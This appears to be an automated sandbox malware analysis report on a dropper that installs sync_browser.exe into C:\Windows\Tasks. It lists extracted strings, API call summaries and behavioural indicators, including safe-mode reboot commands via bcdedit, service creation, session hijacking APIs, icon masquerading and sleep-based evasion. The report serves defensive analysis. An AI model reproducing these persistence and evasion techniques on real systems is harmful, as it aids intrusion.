                          Source: GIjul8.QTIrrr.3.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: sync_browser.exe.7.drBinary or memory string: bcdedit.exe
                          Source: sync_browser.exe.7.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: GIjul8.QTIrrr.0.drBinary or memory string: bcdedit.exe
                          Source: GIjul8.QTIrrr.0.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5987EB0 GetPrivateProfileIntA,21_2_00007FF7D5987EB0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5987650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,21_2_00007FF7D5987650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5987E10 GetPrivateProfileIntA,21_2_00007FF7D5987E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5987D50 GetPrivateProfileIntA,21_2_00007FF7D5987D50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59878E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,21_2_00007FF7D59878E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59877F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,21_2_00007FF7D59877F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5987750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,21_2_00007FF7D5987750
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5987F50 GetPrivateProfileIntA,21_2_00007FF7D5987F50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5989A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,21_2_00007FF7D5989A40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat21_2_00007FF7D593E1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59381AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin21_2_00007FF7D59381AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5987C90 GetPrivateProfileIntA,21_2_00007FF7D5987C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5987BD0 GetPrivateProfileIntA,21_2_00007FF7D5987BD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5987EB0 GetPrivateProfileIntA,26_2_00007FF7D5987EB0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5987650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,26_2_00007FF7D5987650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5987E10 GetPrivateProfileIntA,26_2_00007FF7D5987E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5987D50 GetPrivateProfileIntA,26_2_00007FF7D5987D50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59878E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,26_2_00007FF7D59878E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59877F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,26_2_00007FF7D59877F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5987750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,26_2_00007FF7D5987750
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5987F50 GetPrivateProfileIntA,26_2_00007FF7D5987F50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5989A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,26_2_00007FF7D5989A40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D593E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat26_2_00007FF7D593E1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59381AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin26_2_00007FF7D59381AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5987C90 GetPrivateProfileIntA,26_2_00007FF7D5987C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5987BD0 GetPrivateProfileIntA,26_2_00007FF7D5987BD0
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\5482310161066753Jump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (98).png
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59648B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,21_2_00007FF7D59648B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59648B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,26_2_00007FF7D59648B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5963E20 OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,LoadLibraryA,GetProcAddress,GetStockObject,RegisterClassExA,SetEvent,CreateWindowExA,SetTimer,SetWindowLongPtrA,SetClipboardViewer,CreateThread,CloseHandle,GetModuleFileNameA,GetModuleFileNameA,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetEvent,PeekMessageA,Sleep,CreateRectRgn,CombineRgn,DeleteObject,free,SetEvent,SetEvent,SetEvent,TranslateMessage,DispatchMessageA,WaitMessage,DestroyWindow,DestroyWindow,SetEvent,KillTimer,FreeLibrary,FreeLibrary,FreeLibrary,SetThreadDesktop,CloseDesktop,21_2_00007FF7D5963E20
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5999BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,21_2_00007FF7D5999BC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,21_2_00007FF7D5939D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,26_2_00007FF7D5939D00
                          Source: C:\Windows\Tasks\sync_browser.exeWindow / User API: threadDelayed 512
                          Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 367
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924RJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\sdABZ4.E1924RJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Windows\Tasks\sync_browser.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_21-22501
                          Source: C:\Windows\Tasks\sync_browser.exeAPI coverage: 3.5 %
                          Source: C:\Windows\Tasks\sync_browser.exeAPI coverage: 1.2 %
                          Source: C:\Windows\Tasks\sync_browser.exe TID: 8268Thread sleep time: -51200s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7308Thread sleep count: 54 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 8284Thread sleep count: 34 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 8440Thread sleep count: 367 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 8440Thread sleep time: -36700s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5956DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,21_2_00007FF7D5956DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5935910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,21_2_00007FF7D5935910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59EA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,21_2_00007FF7D59EA228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,21_2_00007FF7D595C210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5956DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,26_2_00007FF7D5956DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5935910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,26_2_00007FF7D5935910
